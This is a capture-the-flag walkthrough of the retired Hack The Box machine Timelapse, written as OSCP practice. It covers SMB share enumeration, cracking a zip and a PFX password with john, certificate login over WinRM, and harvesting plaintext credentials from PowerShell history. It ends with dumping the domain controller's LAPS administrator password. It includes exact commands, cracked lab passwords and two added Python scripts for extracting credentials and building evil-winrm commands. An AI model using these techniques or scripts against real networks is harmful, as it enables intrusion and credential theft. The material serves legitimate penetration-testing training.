OSCP PREPARATIONS – HTB Timelapse

Timelapse is a retired Windows machine on Hack The Box; the goal is to exploit its weaknesses to obtain the user and root flags.
We start with an nmap scan to get to know the target.
Classic Scan

Full port scan

The port scan shows that this is an Active Directory domain controller with SMB exposed, and reveals the domain "timelapse.htb". We add the domain to /etc/hosts and proceed to SMB enumeration.
crackmapexec smb 10.10.11.152

crackmapexec reports the hostname DC01, which we add to /etc/hosts as well.
We then try the following commands, but none of them return any information:
crackmapexec smb 10.10.11.152
crackmapexec smb 10.10.11.152 --users
crackmapexec smb 10.10.11.152 --shares --users
crackmapexec smb 10.10.11.152 -u '' --shares --users
crackmapexec smb 10.10.11.152 -u '.' --shares --users
crackmapexec smb 10.10.11.152 -u '' -p '' --shares --users

enum4linux does not give us much either, so we try smbclient.

smbclient does list the shares; it is always worth trying more than one tool at this stage, since they do not all handle anonymous access the same way.
We connect to the Shares share, list its contents and download the interesting winrm_backup.zip to our local machine for inspection.

The zip is password protected, so we crack it with john (zip2john to extract the hash, then john against a wordlist).

The zip password is supremelegacy. Unzipping the archive gives us a .pfx file.
(A .pfx file is a PKCS#12 container, normally password protected, that bundles a certificate with its private key; such bundles are used for certificate-based authentication to networks, devices and services.)
Trying to extract the key from legacyy_dev_auth.pfx prompts for an import password, and an empty password is rejected. We crack this password with john as well (pfx2john to extract the hash, then john).

The pfx password is thuglegacy.
Now we extract the private key and the certificate from the pfx (openssl asks for the import password we just cracked):
openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out legacyy_dev_auth.key-enc
openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out legacyy_dev_auth.crt
Without -nodes, the first command writes the key PEM-encrypted under a new passphrase that openssl prompts for; you will be asked for that passphrase again when evil-winrm loads the key, or you can strip it first with openssl rsa -in legacyy_dev_auth.key-enc -out legacyy_dev_auth.key.

We then authenticate over WinRM (HTTPS, hence -S) with the certificate and key:
evil-winrm -i 10.10.11.152 -S -k legacyy_dev_auth.key-enc -c legacyy_dev_auth.crt

This gives us a shell and the user flag. Trying to read the Administrator's directory gives Permission denied, so we turn to local enumeration.

We check the PowerShell command history, which PSReadLine keeps in %APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt.

It contains credentials for svc_deploy with the password 'E3R$Q62^12p7PLlC%KWaxuaV'.
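A small parser for exactly this kind of find, added here as an example (it is not code from the original writeup): it scans PowerShell history text for plaintext SecureString constructions, PSCredential objects built from them, and net use credentials, and resolves the $variable so that user and password are reported together. The history text it runs on is a constructed sample modeled on the pattern above, not the real file from the box; the net use line and the CORP\backupop account are invented to show a second pattern.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed sample of a PSReadLine ConsoleHost_history.txt. It is NOT the file
# from the box; it only mimics the pattern the writeup found (a plaintext password
# wrapped into a PSCredential) plus an invented "net use" line for a second pattern.
SAMPLE_HISTORY = r"""whoami
ipconfig /all
netstat -ano | select-string LIST
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {whoami}
net use \\fileserver\share /user:CORP\backupop Summer2022!
get-aduser -filter * -properties *
exit
"""

# $var = ConvertTo-SecureString '<pw>' ...   (only a secret when -AsPlainText is present)
SECURE_STRING_RE = re.compile(
    r"\$(?P<var>\w+)\s*=\s*ConvertTo-SecureString\s+(?P<q>['\"])(?P<pw>.+?)(?P=q)", re.I)
# New-Object ...PSCredential ('<user>', $var)
PSCRED_RE = re.compile(
    r"PSCredential\s*\(\s*(?P<q>['\"])(?P<user>[^'\"]+)(?P=q)\s*,\s*\$(?P<var>\w+)\s*\)", re.I)
# net use ... /user:<user> <password>   (assumes the password follows /user:, one common form)
NET_USE_RE = re.compile(r"\bnet\s+use\b.*?/user:(?P<user>\S+)\s+(?P<pw>[^\s/]\S*)", re.I)


@dataclass
class Finding:
    line_no: int
    kind: str
    user: Optional[str]
    password: Optional[str]


def extract_credentials(history: str) -> List[Finding]:
    """Scan PowerShell history text for credential material.

    Tracks $var assignments so that a PSCredential built from a SecureString
    variable is reported together with the plaintext that variable came from.
    A SecureString read interactively (Read-Host -AsSecureString) is not flagged,
    because no plaintext ever reached the history file.
    """
    findings: List[Finding] = []
    secure_vars: Dict[str, str] = {}  # variable name (lowercased) -> plaintext password
    for n, line in enumerate(history.splitlines(), start=1):
        m = SECURE_STRING_RE.search(line)
        if m and re.search(r"-AsPlainText", line, re.I):
            secure_vars[m.group("var").lower()] = m.group("pw")
            findings.append(Finding(n, "plaintext-securestring", None, m.group("pw")))
            continue
        m = PSCRED_RE.search(line)
        if m:
            # PowerShell variable names are case-insensitive, hence the lowercasing.
            pw = secure_vars.get(m.group("var").lower())
            findings.append(Finding(n, "pscredential", m.group("user"), pw))
            continue
        m = NET_USE_RE.search(line)
        if m:
            findings.append(Finding(n, "net-use", m.group("user"), m.group("pw")))
    return findings


if __name__ == "__main__":
    for f in extract_credentials(SAMPLE_HISTORY):
        print(f"line {f.line_no}: {f.kind:22} user={f.user!r} password={f.password!r}")
```

Run it against every ConsoleHost_history.txt you can read on the box (each profile under C:\Users has its own), not only the one for the account you landed in.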

We connect with evil-winrm again, this time with these credentials.

We are in as svc_deploy, but still cannot read the Administrator's files.
We continue with local enumeration.

In the group membership of svc_deploy, *LAPS_Readers stands out.

LAPS (Local Administrator Password Solution) manages the local administrator password of domain-joined computers: it sets a random per-machine password, rotates it periodically, and stores it in Active Directory in the ms-Mcs-AdmPwd attribute of the computer object, where only principals explicitly granted read access can see it. Membership of LAPS_Readers means svc_deploy can read that attribute, and that is the privilege escalation path.
How the escalation works is explained in detail here:
https://0xdf.gitlab.io/2022/08/20/htb-timelapse.html
Following that writeup, we dump the LAPS password with crackmapexec's laps module:
crackmapexec ldap 10.10.11.152 -u svc_deploy -p 'E3R$Q62^12p7PLlC%KWaxuaV' --kdcHost 10.10.11.152 -M laps

The module returns the local Administrator password of DC01: ](Qr9{{$2Vkn,8,t@i[g7+Rs
With this password we connect with evil-winrm as Administrator.
root.txt is not in the Administrator profile; the root flag is at C:\Users\TRX\Desktop.
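What the laps module reads is the ms-Mcs-AdmPwd attribute, next to ms-Mcs-AdmPwdExpirationTime, which LAPS stores as a Windows FILETIME (100-nanosecond ticks since 1601-01-01 UTC). The following is an added example, not code from the original writeup or from crackmapexec: given LDAP results in that shape, it converts the expiration time, flags passwords that are already past expiry (and so have probably been rotated), skips computers for which the attribute was not returned because the querying account lacks read rights, and renders the matching evil-winrm command. The computer records are constructed; only the DC01 name and the password recovered above come from the writeup, while the expiration date and the WS01 host are assumptions.

```python
from datetime import datetime, timedelta, timezone
from typing import Any, Dict, List

# Windows FILETIME: 100-nanosecond ticks since 1601-01-01 00:00:00 UTC.
# LAPS stores ms-Mcs-AdmPwdExpirationTime as such a value in an LDAP large integer.
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def filetime_to_datetime(ft: int) -> datetime:
    """Convert a FILETIME integer to an aware UTC datetime (sub-microsecond ticks dropped)."""
    return FILETIME_EPOCH + timedelta(microseconds=ft // 10)


def datetime_to_filetime(dt: datetime) -> int:
    """Inverse of filetime_to_datetime; naive datetimes are treated as UTC."""
    if dt.tzinfo is None:
        dt = dt.replace(tzinfo=timezone.utc)
    delta = dt - FILETIME_EPOCH
    return (delta.days * 86_400 + delta.seconds) * 10_000_000 + delta.microseconds * 10


# Constructed sample in the shape of LDAP search results for computer objects.
# The attribute names are the real LAPS schema names; the values are assumptions,
# except the DC01 name and the password this writeup recovered.
SAMPLE_COMPUTERS: List[Dict[str, Any]] = [
    {
        "sAMAccountName": "DC01$",
        "dNSHostName": "dc01.timelapse.htb",
        "ms-Mcs-AdmPwd": "](Qr9{{$2Vkn,8,t@i[g7+Rs",
        "ms-Mcs-AdmPwdExpirationTime": 132915168000000000,  # assumed: 2022-03-12T00:00:00Z
    },
    {
        # A computer the querying account may not read: LDAP simply omits the
        # attribute instead of returning an error, so absence has to be handled.
        "sAMAccountName": "WS01$",
        "dNSHostName": "ws01.timelapse.htb",
    },
]


def laps_passwords(computers: List[Dict[str, Any]], now: datetime) -> List[Dict[str, Any]]:
    """Return one record per readable LAPS password, flagging ones past expiry.

    A password past its expiration time has normally been rotated by the LAPS
    client already, so it is likely stale; a non-expired one is the current value.
    """
    results: List[Dict[str, Any]] = []
    for c in computers:
        pw = c.get("ms-Mcs-AdmPwd")
        if not pw:
            continue  # no read right on this object, or LAPS not deployed on it
        exp_raw = c.get("ms-Mcs-AdmPwdExpirationTime")
        expires = filetime_to_datetime(int(exp_raw)) if exp_raw else None
        results.append({
            "host": c.get("dNSHostName") or c["sAMAccountName"].rstrip("$"),
            "username": "Administrator",  # legacy LAPS manages the built-in admin by default
            "password": pw,
            "expires": expires,
            "expired": expires is not None and expires <= now,
        })
    return results


def evil_winrm_command(entry: Dict[str, Any], ssl: bool = True) -> str:
    """Render an evil-winrm invocation for a LAPS entry with a shell-safe password."""
    pw = entry["password"].replace("'", "'\\''")  # POSIX single-quote escaping
    return f"evil-winrm -i {entry['host']}{' -S' if ssl else ''} -u {entry['username']} -p '{pw}'"


if __name__ == "__main__":
    for e in laps_passwords(SAMPLE_COMPUTERS, datetime.now(timezone.utc)):
        state = "EXPIRED" if e["expired"] else "valid"
        print(f"{e['host']}: {state}, expires {e['expires']}")
        print("  " + evil_winrm_command(e))
```

If the module returns nothing for a machine you expect to be LAPS-managed, the usual cause is the ACL on ms-Mcs-AdmPwd rather than the module: the attribute is silently withheld from accounts without the extended read right.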

Here we got the root flag.